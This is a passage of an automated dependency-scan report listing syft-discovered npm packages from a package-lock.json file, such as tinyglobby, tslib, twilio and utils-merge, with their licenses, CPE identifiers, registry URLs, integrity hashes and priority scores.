severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e99ae3502724aa2b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: tinyglobby 0.2.16' title: tinyglobby 0.2.16 description: 'Package discovered: tinyglobby 0.2.16' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ea1b10e091012c4d name: tinyglobby version: 0.2.16 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:tinyglobby:tinyglobby:0.2.16:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/tinyglobby@0.2.16 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.16.tgz integrity: sha512-pn99VhoACYR8nFHhxqix+uvsbXineAasWm5ojXoN8xEwK5Kd3/TrhNn1wByuD52UxWRLy8pu+kRMniEi6Eq9Zg== dependencies: fdir: ^6.5.0 picomatch: ^4.0.4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 098e9c86e46e996b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: to-regex-range 5.0.1' title: to-regex-range 5.0.1 description: 'Package discovered: to-regex-range 5.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 32aacf96124c437a name: to-regex-range version: 5.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:to-regex-range:to-regex-range:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:to-regex-range:to_regex_range:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:to_regex_range:to-regex-range:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:to_regex_range:to_regex_range:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:to-regex:to-regex-range:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:to-regex:to_regex_range:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:to_regex:to-regex-range:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:to_regex:to_regex_range:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:to:to-regex-range:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:to:to_regex_range:5.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/to-regex-range@5.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz integrity: sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ== dependencies: is-number: ^7.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: eba377c5cfb24e56 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: toidentifier 1.0.1' title: toidentifier 1.0.1 description: 'Package discovered: toidentifier 1.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ce376bb248c7ffa1 name: toidentifier version: 1.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:toidentifier:toidentifier:1.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/toidentifier@1.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz integrity: sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 332c86a1be157c00 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: tr46 0.0.3' title: tr46 0.0.3 description: 'Package discovered: tr46 0.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 44b5fbfc3cffc498 name: tr46 version: 0.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:tr46:tr46:0.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/tr46@0.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz integrity: sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 975e90d4d26bc8ab ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ts-interface-checker 0.1.13' title: ts-interface-checker 0.1.13 description: 'Package discovered: ts-interface-checker 0.1.13' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4b85ef460bf1550e name: ts-interface-checker version: 0.1.13 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:ts-interface-checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ts-interface-checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ts_interface_checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ts_interface_checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ts-interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ts-interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ts_interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ts_interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ts:ts-interface-checker:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ts:ts_interface_checker:0.1.13:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/ts-interface-checker@0.1.13 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ts-interface-checker/-/ts-interface-checker-0.1.13.tgz integrity: sha512-Y/arvbn+rrz3JCKl9C4kVNfTfSm2/mEp5FSz5EsZSANGPSlQrpRI5M4PKF+mJnE52jOO90PnPSc3Ur3bTQw0gA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ef69db02aad9ddba ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: tslib 2.4.1' title: tslib 2.4.1 description: 'Package discovered: tslib 2.4.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a41a6d4fcfaa1c57 name: tslib version: 2.4.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: 0BSD spdxExpression: 0BSD type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:tslib:tslib:2.4.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/tslib@2.4.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz integrity: sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 15d8d07e284b7f66 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: tslib 2.8.1' title: tslib 2.8.1 description: 'Package discovered: tslib 2.8.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 732c6f5be784c8f2 name: tslib version: 2.8.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: 0BSD spdxExpression: 0BSD type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:tslib:tslib:2.8.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/tslib@2.8.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz integrity: sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d407f6f6881f51f1 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: twilio 5.13.1' title: twilio 5.13.1 description: 'Package discovered: twilio 5.13.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b26b672319df2e47 name: twilio version: 5.13.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:twilio:twilio:5.13.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/twilio@5.13.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/twilio/-/twilio-5.13.1.tgz integrity: sha512-sT+PkhptF4Mf7t8eXFFvPQx4w5VHnBIPXbltGPMFRe+R2GxfRdMuFbuNA/cEm0aQR6LFQOn33+fhClg+TjRVqQ== dependencies: axios: ^1.13.5 dayjs: ^1.11.9 https-proxy-agent: ^5.0.0 jsonwebtoken: ^9.0.3 qs: ^6.14.1 scmp: ^2.1.0 xmlbuilder: ^13.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1b446cdccc9a93b0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: type-is 1.6.18' title: type-is 1.6.18 description: 'Package discovered: type-is 1.6.18' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a8ca97010550105a name: type-is version: 1.6.18 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:type-is:type-is:1.6.18:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:type-is:type_is:1.6.18:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:type_is:type-is:1.6.18:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:type_is:type_is:1.6.18:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:type:type-is:1.6.18:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:type:type_is:1.6.18:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/type-is@1.6.18 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz integrity: sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g== dependencies: media-typer: 0.3.0 mime-types: ~2.1.24 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a01b70906be81bf9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: typedarray 0.0.6' title: typedarray 0.0.6 description: 'Package discovered: typedarray 0.0.6' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e635ba578a775ab5 name: typedarray version: 0.0.6 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:typedarray:typedarray:0.0.6:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/typedarray@0.0.6 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz integrity: sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 730b4341f8da3a62 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: undici-types 6.21.0' title: undici-types 6.21.0 description: 'Package discovered: undici-types 6.21.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9968e425c772df9f name: undici-types version: 6.21.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:undici-types:undici-types:6.21.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:undici-types:undici_types:6.21.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:undici_types:undici-types:6.21.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:undici_types:undici_types:6.21.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:undici:undici-types:6.21.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:undici:undici_types:6.21.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/undici-types@6.21.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz integrity: sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a49eb5c706dbb178 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: unicode-properties 1.4.1' title: unicode-properties 1.4.1 description: 'Package discovered: unicode-properties 1.4.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 541fbe3121e73dce name: unicode-properties version: 1.4.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:unicode-properties:unicode-properties:1.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:unicode-properties:unicode_properties:1.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:unicode_properties:unicode-properties:1.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:unicode_properties:unicode_properties:1.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:unicode:unicode-properties:1.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:unicode:unicode_properties:1.4.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/unicode-properties@1.4.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/unicode-properties/-/unicode-properties-1.4.1.tgz integrity: sha512-CLjCCLQ6UuMxWnbIylkisbRj31qxHPAurvena/0iwSVbQ2G1VY5/HjV0IRabOEbDHlzZlRdCrD4NhB0JtU40Pg== dependencies: base64-js: ^1.3.0 unicode-trie: ^2.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d33b9ca7e3f48cc1 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: unicode-trie 2.0.0' title: unicode-trie 2.0.0 description: 'Package discovered: unicode-trie 2.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: aac566dbf0b492ea name: unicode-trie version: 2.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:unicode-trie:unicode-trie:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:unicode-trie:unicode_trie:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:unicode_trie:unicode-trie:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:unicode_trie:unicode_trie:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:unicode:unicode-trie:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:unicode:unicode_trie:2.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/unicode-trie@2.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/unicode-trie/-/unicode-trie-2.0.0.tgz integrity: sha512-x7bc76x0bm4prf1VLg79uhAzKw8DVboClSN5VxJuQ+LKDOVEW9CdH+VY7SP+vX7xCYQqzzgQpFqz15zeLvAtZQ== dependencies: pako: ^0.2.5 tiny-inflate: ^1.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4121fde58e5100ef ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: unpipe 1.0.0' title: unpipe 1.0.0 description: 'Package discovered: unpipe 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 294cc6dab10e14ff name: unpipe version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:unpipe:unpipe:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/unpipe@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz integrity: sha512-pjy2bYhSsufwWlKwPc+l3cN7+wuJlK6uz0YdJEOlQDbl6jo/YlPi4mb8agUkVC8BF7V8NuzeyPNqRksA3hztKQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0c87db67edbd6edf ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: update-browserslist-db 1.2.3' title: update-browserslist-db 1.2.3 description: 'Package discovered: update-browserslist-db 1.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7776752fe1d43a3e name: update-browserslist-db version: 1.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:update-browserslist-db:update-browserslist-db:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:update-browserslist-db:update_browserslist_db:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:update_browserslist_db:update-browserslist-db:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:update_browserslist_db:update_browserslist_db:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:update-browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:update-browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:update_browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:update_browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:update:update-browserslist-db:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:update:update_browserslist_db:1.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/update-browserslist-db@1.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.2.3.tgz integrity: sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w== dependencies: escalade: ^3.2.0 picocolors: ^1.1.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1ae47d19bb25f29a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: util-deprecate 1.0.2' title: util-deprecate 1.0.2 description: 'Package discovered: util-deprecate 1.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: aac5900c84ec45ff name: util-deprecate version: 1.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:util-deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:util-deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:util_deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:util_deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:util:util-deprecate:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:util:util_deprecate:1.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/util-deprecate@1.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz integrity: sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ea9355f8957e8bab ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: utils-merge 1.0.1' title: utils-merge 1.0.1 description: 'Package discovered: utils-merge 1.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4f715b1e9b38109a name: utils-merge version: 1.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:utils-merge:utils-merge:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:utils-merge:utils_merge:1.0.1:*:*:*:*:*:*:* source: 